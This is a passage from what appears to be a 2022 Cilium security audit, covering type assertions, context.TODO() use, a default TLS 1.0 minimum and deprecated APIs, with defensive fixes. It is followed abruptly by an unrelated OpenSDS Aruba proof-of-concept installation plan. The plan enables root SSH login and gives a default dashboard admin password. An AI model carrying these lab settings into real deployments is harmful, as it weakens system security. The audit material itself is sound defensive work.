k.ToHost().(*SourceRangeKey4)\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/maps/lbmap/source_range.g\no#L96\nkHost := k.ToHost().(*SourceRangeKey6)\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/maps/metricsmap/metricsma\np.go#L90-L91\nkey :=k.(*Key)values :=v.(*Values)\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/maps/nat/nat.go#L131-L138\ncb :=func(k bpf.MapKey, v bpf.MapValue) {key :=k.(NatKey)if!key.ToHost().Dump(&sb,false) {return}\n64Cilium security audit, 2022\nval :=v.(NatEntry)sb.WriteString(val.ToHost().Dump(key, nsecStart))}\nhttps://github.com/cilium/cilium/blob/d1d8e7a35b35d3420a33251767ae2696d664da53/pkg/maps/policymap/policyma\np.go#L375-L381\ncb :=func(key bpf.MapKey, value bpf.MapValue) {eDump := PolicyEntryDump{Key: *key.DeepCopyMapKey().(*PolicyKey),PolicyEntry: *value.DeepCopyMapValue().(*PolicyEntry),}entries =append(entries, eDump)}\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/maps/recorder/recorder.go#L6\n0-L65\ncb :=func(k bpf.MapKey, v bpf.MapValue) {key :=k.(RecorderKey)key.ToHost().Dump(&sb)val :=v.(RecorderEntry)val.Dump(&sb)}\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/srv6map/policy.go#L\n158-L167\nfunc(k, vinterface{}) {key4 :=k.(*PolicyKey4)key := PolicyKey{VRFID: key4.VRFID,DestCIDR: key4.getDestCIDR(),}value :=v.(*PolicyValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/srv6map/policy.go#L\n174-L183\nfunc(k, vinterface{}) {key6 :=k.(*PolicyKey6)key := PolicyKey{VRFID: key6.VRFID,DestCIDR: key6.getDestCIDR(),}value :=v.(*PolicyValue)\ncb(&key, value)})\n65Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/9c07b75282546500e26da55c46b7cf9c110205f0/pkg/maps/srv6map/sid.go#L96-L\n97\nkey :=k.(*SIDKey)value :=v.(*SIDValue)\nhttps://github.com/cilium/cilium/blob/fe9baa95eadc9ab678af619063ba443a4abcafbd/pkg/maps/srv6map/state.go#L92\n-L103\nfunc(k, vinterface{}) {key4 :=k.(*StateKey4)srcIP := key4.InnerSrc.IP()dstIP := key4.InnerDst.IP()key := StateKey{InnerSrc: &srcIP,InnerDst: &dstIP,}value :=v.(*StateValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/fe9baa95eadc9ab678af619063ba443a4abcafbd/pkg/maps/srv6map/state.go#L11\n0-L121\nfunc(k, vinterface{}) {key6 :=k.(*StateKey6)srcIP := key6.InnerSrc.IP()dstIP := key6.InnerDst.IP()key := StateKey{InnerSrc: &srcIP,InnerDst: &dstIP,}value :=v.(*StateValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/srv6map/vrf.go#L158\n-L168\nfunc(k, vinterface{}) {key4 :=k.(*VRFKey4)srcIP := key4.SourceIP.IP()key := VRFKey{SourceIP: &srcIP,DestCIDR: key4.getDestCIDR(),}value :=v.(*VRFValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/srv6map/vrf.go#L175\n-L185\n66Cilium security audit, 2022\nfunc(k, vinterface{}) {key6 :=k.(*VRFKey6)srcIP := key6.SourceIP.IP()key := VRFKey{SourceIP: &srcIP,DestCIDR: key6.getDestCIDR(),}value :=v.(*VRFValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/da9d6a0167e1cede54480dbe832ef0ef5dca3aa8/pkg/nodediscovery/nodediscove\nry.go#L456\ntypesNode :=nodeInterface.(*k8sTypes.Node)\n67Cilium security audit, 2022\n20: Ill-defined contexts\nOverall severity:\nInformational\nID:\nADA-CIL-20\nLocation:\nSeveral packages\nDescription\nAt the time of the audit, Cilium has 149 cases of 
ill-defined contexts - context.TODO(). To reproduce:

    git clone https://github.com/cilium/cilium --depth=1
    cd cilium
    rm -r test
    rm -r vendor
    grep -r "context\.TODO" --exclude=*_test.go

The Golang docs state about context.TODO():
"TODO returns a non-nil, empty Context. Code should use context.TODO when it's unclear which Context to use or it is not yet available (because the surrounding function has not yet been extended to accept a Context parameter)."
As such, ill-defined contexts should be avoided in Cilium's production code.

Recommendation
A best effort of using well-defined contexts over time.

21: Use of deprecated TLS version
Overall severity: Informational
ID: ADA-CIL-21
Location: pkg/crypto/certloader
CWE:
● CWE-326: Inadequate Encryption Strength
● CWE-327: Use of a Broken or Risky Cryptographic Algorithm
● CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')
Fix: https://github.com/cilium/cilium/commit/ca890a4938f765be78db19ac77916eff1be66a3f

Description
By default a crypto/tls.Config sets the minimum accepted TLS version to 1.0 when acting as a server. From the Golang docs on crypto/tls.Config:
"// By default, TLS 1.2 is currently used as the minimum when acting as a
// client, and TLS 1.0 when acting as a server. TLS 1.0 is the minimum
// supported by this package, both as a client and as a server."
This is an issue in case a minimum TLS version is not specified in the Config. TLS 1.0 and TLS 1.1 are formally deprecated, and a number of known attacks exploit weaknesses of these protocols. For example, TLS 1.0 and TLS 1.1 rely on MD5 and SHA-1, which makes the protocols vulnerable to downgrade attacks. Authentication of handshakes is done based on SHA-1, which increases the chance for an attacker to carry out a MITM attack by impersonating a server.

https://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/crypto/certloader/server.go#L102

    func (c *WatchedServerConfig) ServerConfig(base *tls.Config) *tls.Config {
        // We return a tls.Config having only the GetConfigForClient member set.
        // When a client initialize a TLS handshake, this function will be called
        // and the tls.Config returned by GetConfigForClient will be used. This
        // mechanism allow us to reload the certificates transparently between two
        // clients connections without having to restart the server.
        // See also the discussion at https://github.com/golang/go/issues/16066.
        return &tls.Config{
            GetConfigForClient: func(_ *tls.ClientHelloInfo) (*tls.Config, error) {
                keypair, caCertPool := c.KeypairAndCACertPool()
                tlsConfig := base.Clone()
                tlsConfig.Certificates = []tls.Certificate{*keypair}
                if c.IsMutualTLS() {
                    // We've been configured to serve mTLS, so setup the ClientCAs
                    // accordingly.
                    tlsConfig.ClientCAs = caCertPool
                    // The caller may have its own desire about the handshake
                    // ClientAuthType. We honor it unless its tls.NoClientCert (the
                    // default zero value) as we are configured to serve mTLS.
                    if tlsConfig.ClientAuth == tls.NoClientCert {
                        tlsConfig.ClientAuth = tls.RequireAndVerifyClientCert
                    }
                }
                c.log.WithField("keypair-sn", keypairId(keypair)).Debugf("Server tls handshake")
                return tlsConfig, nil
            },
        }
    }

Recommendations
Specify the minimum accepted TLS version in the crypto/tls.Config (a minimal sketch follows below).
The Cilium maintainers triaged this issue and found that the existing users of this library code ensured a newer TLS version was used. This included Hubble clients and servers.
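A minimal illustration of the recommendation, not the code from the commit linked above, is to set an explicit floor on the negotiated version wherever the tls.Config is built:

    import "crypto/tls"

    // hardenTLS clones an existing config and enforces TLS 1.2 as the minimum
    // accepted protocol version, overriding the crypto/tls server-side default
    // of TLS 1.0 documented at the time of the audit.
    func hardenTLS(base *tls.Config) *tls.Config {
        if base == nil {
            base = &tls.Config{}
        }
        cfg := base.Clone()
        cfg.MinVersion = tls.VersionTLS12 // or tls.VersionTLS13 where all peers support it
        return cfg
    }

In the certloader code above, the same single assignment could be made on the tlsConfig returned from GetConfigForClient.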
The library code itself did not previously enforce a new enough TLS version.

22: Deprecated function calls
Overall severity: Low
ID: ADA-CIL-22
Location: Several packages
CWE:
● CWE-477: Use of Obsolete Function

Description
Deprecated 3rd-party APIs may be abandoned to a degree where patches to known security issues are not applied. Cilium makes calls to deprecated APIs in several places throughout the codebase. We recommend creating a strategy to replace deprecated APIs over time. It could be shared in a public Github issue to get support from the community.
At commit 398cf5e051c49a46941d1efedf9659740d80f52c, these are the uses of deprecated APIs that need addressing:

Location   Deprecated API call
api/v1/health/server/server.go:316:3   httpsServer.TLSConfig.BuildNameToCertificate
api/v1/operator/server/server.go:317:3   httpsServer.TLSConfig.BuildNameToCertificate
api/v1/server/server.go:316:3   httpsServer.TLSConfig.BuildNameToCertificate
daemon/cmd/status.go:256:29   strings.Title
daemon/cmd/status.go:266:37   strings.Title
operator/metrics/metrics.go:139:24   prometheus.NewProcessCollector
pkg/aws/ec2/ec2.go:79:25   aws.EndpointResolverFunc
pkg/envoy/accesslog_server.go:167:14   pblog.Method
pkg/envoy/accesslog_server.go:168:18   pblog.Status
pkg/envoy/accesslog_server.go:169:23   pblog.Scheme
pkg/envoy/accesslog_server.go:169:37   pblog.Host
pkg/envoy/accesslog_server.go:169:49   pblog.Path
pkg/envoy/accesslog_server.go:170:26   pblog.HttpProtocol
pkg/envoy/accesslog_server.go:171:32   pblog.Headers
pkg/envoy/sort.go:221:8   m1.GetExactMatch
pkg/envoy/sort.go:222:8   m2.GetExactMatch
pkg/envoy/sort.go:230:10   m1.GetSafeRegexMatch
pkg/envoy/sort.go:231:10   m2.GetSafeRegexMatch
pkg/envoy/sort.go:275:7   m1.GetPrefixMatch
pkg/envoy/sort.go:276:7   m2.GetPrefixMatch
pkg/envoy/sort.go:284:7   m1.GetSuffixMatch
pkg/envoy/sort.go:285:7   m2.GetSuffixMatch
pkg/health/client/client.go:59:3   tr.Dial
pkg/health/client/client.go:64:3   tr.Dial
pkg/hubble/metrics/drop/handler.go:56:62   flow.GetDropReason
pkg/hubble/parser/seven/parser.go:125:2   decoded.DropReason
pkg/hubble/parser/seven/parser.go:137:2   decoded.Reply
pkg/hubble/parser/seven/parser.go:144:2   decoded.Summary
pkg/hubble/parser/sock/parser.go:118:2   decoded.Summary
pkg/hubble/parser/threefour/parser.go:193:2   decoded.DropReason
pkg/hubble/parser/threefour/parser.go:194:41   decoded.DropReason
pkg/hubble/parser/threefour/parser.go:205:2   decoded.Reply
pkg/hubble/parser/threefour/parser.go:214:2   decoded.Summary
pkg/hubble/peer/types/client.go:56:45   grpc.WithInsecure
pkg/hubble/relay/pool/client.go:53:23   grpc.WithInsecure
pkg/hubble/relay/pool/option.go:29:4   grpc.WithInsecure
pkg/k8s/informer/informer.go:86:10   cache.NewDeltaFIFO
pkg/k8s/slim/k8s/apis/labels/selector.go:270:32   sets.String
pkg/k8s/slim/k8s/apis/labels/selector.go:271:9   sets.String
pkg/k8s/slim/k8s/apis/labels/selector.go:689:13   sets.String
pkg/k8s/slim/k8s/apis/labels/selector.go:755:33   sets.String
pkg/k8s/slim/k8s/apis/labels/selector.go:781:42   sets.String
pkg/k8s/slim/k8s/apis/labels/selector.go:817:37   sets.String
proxylib/npds/client.go:137:35   grpc.WithInsecure
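As one concrete example of the kind of replacement this table calls for (the standard grpc-go migration, not a change taken from Cilium), the deprecated grpc.WithInsecure() dial option has a direct substitute:

    import (
        "google.golang.org/grpc"
        "google.golang.org/grpc/credentials/insecure"
    )

    // dialPlaintext dials a gRPC endpoint without transport security using the
    // non-deprecated spelling: grpc.WithTransportCredentials(insecure.NewCredentials())
    // replaces grpc.WithInsecure().
    func dialPlaintext(target string) (*grpc.ClientConn, error) {
        return grpc.Dial(target, grpc.WithTransportCredentials(insecure.NewCredentials()))
    }

Most of the other entries have similarly mechanical substitutes (for example, strings.Title is superseded by the golang.org/x/text/cases package), so tracking them in a public GitHub issue, as recommended above, keeps the migration visible to the community.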
{ "category": "Runtime", "file_name": "OpenSDS_Aruba_POC_Plan.pdf", "project_name": "Soda Foundation", "subcategory": "Cloud Native Storage" }
[ { "data": " \n OpenSDS Aruba POC Test Plan June 2018 Revision: 0.6 Author: OpenSDS OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT ii Document Revision History Version Date Comments 0.1 6/12/2018 Initial revision. 0.2 6/15/2018 Added content to sections host-based replication, array-based replication, CLI guide, Cinder compatible APIs. 0.3 6/20/2018 Modified dates after reviewing it at OSS Summit Tokyo 0.4 6/26/2018 Add Dashboard section; Modify CLI section. 0.5 6/29/2018 Update Dashboard section and Installation section. 0.6 7/05/2018 Update the use cases of dashboard and replication with kubernetes Related Documents Author Documents OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT iii Table of Contents 1 Overview................................................................................................................ 1 1.1 Project Scope and Objectives .................................................................................................. 1 1.2 POC Timeline ........................................................................................................................... 2 2 System requirements............................................................................................ 2 2.1 Hardware .................................................................................................................................. 2 2.2 Software .................................................................................................................................... 2 \n OS ....................................................................................................................................... 2 3 Features .................................................................................................................. 3 4 Installation............................................................................................................. 4 4.1 Prerequisite ............................................................................................................................... 4 \n Packages ............................................................................................................................. 4 \n Golang ................................................................................................................................ 4 \n docker ................................................................................................................................. 4 4.2 Kubernetes Local Cluster Deployment ................................................................................... 5 \n Install Etcd ......................................................................................................................... 5 \n kubernetes local cluster ..................................................................................................... 5 4.3 OpenSDS Deployment ............................................................................................................. 6 \n Pre-config ........................................................................................................................... 6 \n Download opensds-installer code .................................................................................... 6 \n Install ansible tool.............................................................................................................. 6 \n Configure OpenSDS cluster variables .............................................................................. 
6 4.3.4.1 System environment ...................................................................................................... 6 4.3.4.2 LVM .............................................................................................................................. 7 4.3.4.3 Ceph .............................................................................................................................. 7 4.3.4.4 Cinder............................................................................................................................ 7 \n Check if the hosts can be reached ..................................................................................... 8 \n Run opensds-ansible playbook to start deploy ............................................................... 8 4.4 Test OpenSDS ........................................................................................................................... 8 \n Use OpenSDS CLI Tool ..................................................................................................... 8 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT iv \n Test CSI Plugin .................................................................................................................. 9 \n OpenSDS Dashboard......................................................................................................... 9 4.5 Cleanup OpenSDS .................................................................................................................... 9 \n Run opensds-ansible playbook to clean the environment .............................................. 9 \n Run ceph-ansible playbook to clean ceph cluster if ceph is deployed ......................... 10 \n Remove ceph-ansible source code (optional) ................................................................ 10 4.6 Troubleshooting ..................................................................................................................... 10 \n Problem Starting CSI Plugin ........................................................................................... 10 5 Use Cases ............................................................................................................. 11 5.1 Dashboard .............................................................................................................................. 11 \n Administrator configuration .......................................................................................... 11 5.1.1.1 Login ........................................................................................................................... 11 5.1.1.2 Create tenant ............................................................................................................... 12 5.1.1.3 Create user ................................................................................................................... 12 5.1.1.4 Create profile................................................................................................................ 13 5.1.1.5 View resources ............................................................................................................. 13 \n Tenant provision volume ................................................................................................ 14 5.1.2.1 Overview ..................................................................................................................... 
14 5.1.2.2 Create volume .............................................................................................................. 14 5.1.2.3 Expand volume size...................................................................................................... 15 5.1.2.4 Create volume snapshot ................................................................................................ 15 5.1.2.5 Create volume from snapshot........................................................................................ 16 5.1.2.6 Create volume replication ............................................................................................. 16 5.1.2.7 Disable/Enable/Failover volume replication .................................................................. 17 5.1.2.8 Create volume group .................................................................................................... 17 5.1.2.9 Add volumes into group ............................................................................................... 18 5.1.2.10 Tenant isolation ....................................................................................................... 18 5.2 Kubernetes .............................................................................................................................. 20 5.3 OpenStack .............................................................................................................................. 20 \n Use OpenSDS to Manage Cinder Drivers ...................................................................... 21 5.3.1.1 Prepare ........................................................................................................................ 21 5.3.1.2 Install OpenStack using devstack ................................................................................. 21 5.3.1.3 Install ceph using ansible ............................................................................................. 21 5.3.1.4 Configuration .............................................................................................................. 22 5.3.1.4.1 OpenSDS ............................................................................................................. 22 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT v 5.3.1.4.2 Set ceph as backend of Cinder ........................................................................... 23 5.3.1.5 Testing......................................................................................................................... 24 \n OpenSDS with Cinder Compatible API ......................................................................... 25 5.3.2.1 Installation .................................................................................................................. 25 5.3.2.2 Volume Types .............................................................................................................. 26 5.3.2.2.1 List all volume types (default policy) ................................................................ 26 5.3.2.2.2 Delete a volume type .......................................................................................... 26 5.3.2.2.3 List all volume types(0) ...................................................................................... 26 5.3.2.2.4 Create a volume type .......................................................................................... 27 5.3.2.2.5 Show volume type detail .................................................................................... 
27 5.3.2.2.6 Create a volume type(2nd) ............................................................................ 27 5.3.2.2.7 List all volume types (2) ..................................................................................... 27 5.3.2.2.8 Update an encryption type ................................................................................. 28 5.3.2.2.9 Lists current volume types and extra specs. ..................................................... 28 5.3.2.2.10 Create or update extra specs for volume type ................................................ 29 5.3.2.2.11 Delete extra specification for volume type ...................................................... 29 5.3.2.3 Volumes ....................................................................................................................... 29 5.3.2.3.1 List accessible volumes with details (0) ............................................................. 29 5.3.2.3.2 Create a volume (1st) .......................................................................................... 30 5.3.2.3.3 List accessible volumes with details (1) ............................................................. 30 5.3.2.3.4 Show a volume’s details ..................................................................................... 30 5.3.2.3.5 Delete a volume .................................................................................................. 30 5.3.2.4 Snapshots..................................................................................................................... 30 5.3.2.4.1 Create a snapshot ................................................................................................ 31 5.3.2.4.2 List snapshots and details .................................................................................. 31 5.3.2.4.3 Show a snapshot’s details ................................................................................... 31 5.3.2.4.4 Delete a snapshot ................................................................................................ 31 5.3.2.5 Attachments ................................................................................................................ 31 5.3.2.5.1 Create attachment ............................................................................................... 31 5.3.2.5.2 Show attachment................................................................................................. 31 5.3.2.5.3 List attachment .................................................................................................... 32 5.3.2.5.4 Update attachment ............................................................................................. 32 5.3.2.5.5 Delete attachment ............................................................................................... 33 5.4 Array-based Replication using Dorado................................................................................ 34 \n Without Kubernetes ........................................................................................................ 34 5.4.1.1 Configuration .............................................................................................................. 34 5.4.1.2 Testing......................................................................................................................... 
38 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT vi \n With Kubernetes .............................................................................................................. 41 5.4.2.1 Configuration .............................................................................................................. 41 5.4.2.2 Testing steps ................................................................................................................ 45 5.5 Host-based Replication using DRBD ................................................................................... 47 \n Prepare ............................................................................................................................. 47 \n Install DRBD .................................................................................................................... 47 \n Configuration .................................................................................................................. 47 \n Create Replication ........................................................................................................... 49 \n Check result ..................................................................................................................... 50 6 OpenSDS CLI Guide ......................................................................................... 51 6.1 List Docks ............................................................................................................................... 51 6.2 List Pools ................................................................................................................................ 52 6.3 Create/Delete Profile.............................................................................................................. 53 6.4 Create/Delete/Get/List Volume(s) ......................................................................................... 53 6.5 Create/Delete/Get/List Snapshot(s) ...................................................................................... 55 6.6 Create Volume from Snapshot............................................................................................... 56 6.7 Expand Volume....................................................................................................................... 57 6.8 Create/Update/Delete/Get/List Volume Groups .................................................................. 58 6.9 Replication ............................................................................................................................. 60 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 1 1 Overview OpenSDS Aruba will be released in the week of June 27, 2018. This document serves as the OpenSDS Aruba POC Test Plan. It covers the following topics: 1. Overall project scope and objectives 2. Test objectives and success criteria 3. Test resources required 4. Test schedule 5. Use cases a. OpenStack/Kubernetes/bare-metal/mixed environment provisioning b. Host and storage replication, and local and remote replication c. Test cases for each use case 1.1 Project Scope and Objectives \nIn the Zealand release, basic volume and snapshot CRUD functionalities were added and Kubernetes CSI/FlexVolume support was also added. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 2 During the Aruba release, the focus has been on storage orchestration, building advanced automated storage and data services across traditional data centers, private and public clouds. 
Functionalities in this release include basic OpenStack integration, integrating with Keystone for identity service, array-based and host-based replication, and storage profiles design based on Swordfish. A deployment tool using Ansible is also available to install OpenSDS with Keystone and Dashboard. 1.2 POC Timeline June 15: POC plan draft ready for EUAC review June 20: Aruba release. POC plan approval. July 1-31: POC testing August 7: POC results/comments/testimonials 2 System requirements 2.1 Hardware The hardware requirements are described in this section. For array-based replication, two physical servers and two Dorado arrays are needed. For host-based replication, two physical servers are needed. For other tests described in this POC, one physical server or one VM can be used for basic testing. 2.2 Software The software requirements are described in this section. \n OS Ubuntu 16.04.2 has been used during the testing and therefore should be used in this POC: root@proxy:~# cat /etc/issue Ubuntu 16.04.2 LTS \\n \\l OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 3 For host-based replication, required DRBD software is described in the relevant section later. Other required software is described in the installation section. 3 Features Features to be tested include the following: - Multitenancy using Keystone - Create/delete volume - Expand volume - Create/delete snapshot - Create volume from snapshot - Create volume group - Create/delete profile - Array-based replication - Host-based replication - Use Cinder-compatible API in OpenStack Supported storage backends include the following: - LVM - Ceph - Dorado - IBM storage via Cinder driver? - Cinder stand alone with LVM - Cinder in an OpenStack deployment with LVM Supported protocols: - iSCSI OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 4 - FC - RBD Testing environment includes the following: - OpenSDS with Kubernetes - OpenSDS with OpenStack (full OpenStack deployment or Cinder stand-alone) - Hotpot only on bare-metal or a VM 4 Installation In the section, how to install OpenSDS using Ansible playbook will be discussed. Section 4.1 is prerequisites for Installation. If you are testing OpenSDS with Kubernetes, read section 4.2 Kubernetes Local Cluster Deployment first. Otherwise, go to section 4.3 directly. For OpenSDS with OpenStack, testing with Cinder stand-alone is part of the OpenSDS ansible installation in section 4.3, and testing with a separate Cinder deployment is discussed in section 5.3 OpenStack. 
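For orientation, the installation flow that sections 4.1 through 4.4 walk through condenses to roughly the following command sequence (all commands are taken from the subsections below; the backend, plugin type and IP variables in group_vars still have to be edited for your environment first):
git clone https://github.com/opensds/opensds-installer.git
cd opensds-installer/ansible
chmod +x ./install_ansible.sh && ./install_ansible.sh
ansible all -m ping -i local.hosts
ansible-playbook site.yml -i local.hosts
osdsctl pool list    # check that the deployment exposes at least one pool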
4.1 Prerequisite \n Packages Install following packages: apt-get install vim git curl wget make gcc zip \n Golang You can install golang by executing commands blow: wget https://storage.googleapis.com/golang/go1.9.2.linux-amd64.tar.gz tar -C /usr/local -xzf go1.9.2.linux-amd64.tar.gz echo 'export PATH=$PATH:/usr/local/go/bin' >> /etc/profile echo 'export GOPATH=$HOME/gopath' >> /etc/profile source /etc/profile Check golang version information: root@proxy:~# go version go version go1.9.2 linux/amd64 \n docker Install docker: OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 5 wget https://download.docker.com/linux/ubuntu/dists/xenial/pool/stable/amd64/docker-ce_18.03.1~ce-0~ubuntu_amd64.deb dpkg -i docker-ce_18.03.1~ce-0~ubuntu_amd64.deb Version information: root@proxy:~# docker version Client: Version: 18.03.1-ce API version: 1.37 Go version: go1.9.5 Git commit: 9ee9f40 Built: Thu Apr 26 07:17:20 2018 OS/Arch: linux/amd64 Experimental: false Orchestrator: swarm Server: Engine: Version: 18.03.1-ce API version: 1.37 (minimum version 1.12) Go version: go1.9.5 Git commit: 9ee9f40 Built: Thu Apr 26 07:15:30 2018 OS/Arch: linux/amd64 Experimental: false 4.2 Kubernetes Local Cluster Deployment \n Install Etcd You can install etcd by executing commands blow: cd $HOME wget https://github.com/coreos/etcd/releases/download/v3.3.0/etcd-v3.3.0-linux-amd64.tar.gz tar -xzf etcd-v3.3.0-linux-amd64.tar.gz cd etcd-v3.3.0-linux-amd64 sudo cp -f etcd etcdctl /usr/local/bin/ \n kubernetes local cluster You can start the latest k8s local cluster by executing commands blow: cd $HOME git clone https://github.com/kubernetes/kubernetes.git cd $HOME/kubernetes git checkout v1.10.0 make echo alias kubectl='$HOME/kubernetes/cluster/kubectl.sh' >> /etc/profile ALLOW_PRIVILEGED=true FEATURE_GATES=CSIPersistentVolume=true,MountPropagation=true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 6 RUNTIME_CONFIG=\"storage.k8s.io/v1alpha1=true\" LOG_LEVEL=5 hack/local-up-cluster.sh 4.3 OpenSDS Deployment In this section, the steps to deploy an OpenSDS local cluster are described. \n Pre-config First download some system packages: apt-get install -y git curl wget Then config /etc/ssh/sshd_config file and change one line: PermitRootLogin yes Next generate ssh-token: ssh-keygen -t rsa ssh-copy-id -i ~/.ssh/id_rsa.pub <ip_address> # IP address of the target machine of the installation \n Download opensds-installer code git clone https://github.com/opensds/opensds-installer.git cd opensds-installer/ansible \n Install ansible tool To install ansible, run the commands below: # This step is needed to upgrade ansible to version 2.4.2 which is required for the \"include_tasks\" ansible command. chmod +x ./install_ansible.sh && ./install_ansible.sh ansible --version # Ansible version 2.4.x is required. \n Configure OpenSDS cluster variables 4.3.4.1 System environment To integrate OpenSDS with cloud platform (for example k8s), modify nbp_plugin_type variable in group_vars/common.yml: nbp_plugin_type: hotpot_only # hotpot_only is the default integration method. Other available options are 'csi' and 'flexvolume'. OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 7 Note: If ‘csi’ is the selected nbp_plugin_type, make sure section 4.2 Kubernetes Local Cluster Deployment is followed before proceeding. 
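Before running the playbook in 'csi' mode, it may also help to confirm that the local Kubernetes cluster from section 4.2 is actually serving requests; a quick sanity check (assuming the kubectl alias configured earlier) is:
kubectl cluster-info
kubectl get nodes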
Change opensds_endpoint to the actual IP address: opensds_endpoint: http://127.0.0.1:50040 # The IP (127.0.0.1) should be replaced with the opensds actual endpoint IP 4.3.4.2 LVM If lvm is chosen as the storage backend, there is no need to modify group_vars/osdsdock.yml because it is the default choice: enabled_backend: lvm # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' Change tgtBindIp variable in group_vars/lvm/lvm.yaml to your real host IP address: tgtBindIp: 127.0.0.1 # change tgtBindIp to your real host ip, run 'ifconfig' to check 4.3.4.3 Ceph If ceph is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: ceph # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder'. Configure group_vars/ceph/all.yml with an example below: ceph_origin: repository ceph_repository: community ceph_stable_release: luminous # Choose luminous as default version public_network: \"192.168.3.0/24\" # Run 'ip -4 address' to check the ip address cluster_network: \"{{ public_network }}\" monitor_interface: eth1 # Change to the network interface on the target machine devices: # For ceph devices, append ONE or MULTIPLE devices like the example below: - '/dev/sda' # Ensure this device exists and available if ceph is chosen #- '/dev/sdb' # Ensure this device exists and available if ceph is chosen osd_scenario: collocated 4.3.4.4 Cinder If cinder is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: cinder # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' # Use block-box install cinder_standalone if true, see details in: OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 8 use_cinder_standalone: true Configure the auth and pool options to access cinder in group_vars/cinder/cinder.yaml. Do not need to make additional configure changes if using cinder standalone. \n Check if the hosts can be reached ansible all -m ping -i local.hosts \n Run opensds-ansible playbook to start deploy ansible-playbook site.yml -i local.hosts 4.4 Test OpenSDS \n Use OpenSDS CLI Tool Configure OpenSDS CLI tool: sudo cp /opt/opensds-linux-amd64/bin/osdsctl /usr/local/bin export OPENSDS_ENDPOINT=http://{your_real_host_ip}:50040 export OPENSDS_AUTH_STRATEGY=keystone source /opt/stack/devstack/openrc admin admin osdsctl pool list # Check if the pool resource is available Create a default profile: osdsctl profile create '{\"name\": \"default\", \"description\": \"default policy\"}' Create a volume: osdsctl volume create 1 --name=test-001 List all volumes: osdsctl volume list Delete the volume: OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 9 osdsctl volume delete <your_volume_id> \n Test CSI Plugin After running the ansible deployment tool in “csi” mode, three CSI plugin pods can be found by kubectl get pods like below: o csi-provisioner-opensdsplugin o csi-attacher-opensdsplugin o csi-nodeplugin-opensdsplugin More design details about CSI can be found from CSI Volume Plugins in Kubernetes Design Doc. To test the OpenSDS CSI plugin, create an example nginx application: cd /opt/opensds-k8s-linux-amd64/ && kubectl create -f csi/server/examples/kubernetes/nginx.yaml This will create an OpenSDS volume and mount the volume at /var/lib/www/html. Use the following command to inspect the nginx container to verify it. 
docker exec -it <nginx container id> /bin/bash Clean up example nginx application by the following commands: kubectl delete -f csi/server/examples/kubernetes/nginx.yaml \n OpenSDS Dashboard OpenSDS UI dashboard is available at http://{your_host_ip}:8088, please login the dashboard using the default admin credentials: admin/opensds@123. Create tenant, user, and profiles as admin. Logout of the dashboard as admin and login the dashboard again as a non-admin user to create volume, snapshot, expand volume, create volume from snapshot, create volume group. 4.5 Cleanup OpenSDS \n Run opensds-ansible playbook to clean the environment ansible-playbook clean.yml -i local.hosts This should clean up hotpot as well as nbp (including the CSI plugin). OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 10 \n Run ceph-ansible playbook to clean ceph cluster if ceph is deployed cd /opt/ceph-ansible sudo ansible-playbook infrastructure-playbooks/purge-cluster.yml -i ceph.hosts In addition, clean up the logical partition on the physical block device used by ceph, using the fdisk tool. \n Remove ceph-ansible source code (optional) sudo rm -rf /opt/ceph-ansible 4.6 Troubleshooting \n Problem Starting CSI Plugin If the CSI plugin cannot be started, check if OpenSDS endpoint IP is configured. vi csi/server/deploy/kubernetes/csi-configmap-opensdsplugin.yaml The IP (127.0.0.1) should be replaced with the opensds and identity actual endpoint IP. kind: ConfigMap apiVersion: v1 metadata: name: csi-configmap-opensdsplugin data: opensdsendpoint: http://127.0.0.1:50040 osauthurl: http://127.0.0.1/identity Manually create OpenSDS CSI pods: kubectl create -f csi/server/deploy/kubernetes After this, three pods can be found by kubectl get pods like below: o csi-provisioner-opensdsplugin o csi-attacher-opensdsplugin OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 11 o csi-nodeplugin-opensdsplugin To test the OpenSDS CSI plugin, create an example nginx application: kubectl create -f csi/server/examples/kubernetes/nginx.yaml This will mount an OpenSDS volume into /var/lib/www/html. Use the following command to inspect the nginx container to verify it. docker exec -it <nginx container id> /bin/bash Clean up example nginx application and opensds CSI pods by the following commands. kubectl delete -f csi/server/examples/kubernetes/nginx.yaml kubectl delete -f csi/server/deploy/kubernetes 5 Use Cases 5.1 Dashboard \n Administrator configuration 5.1.1.1 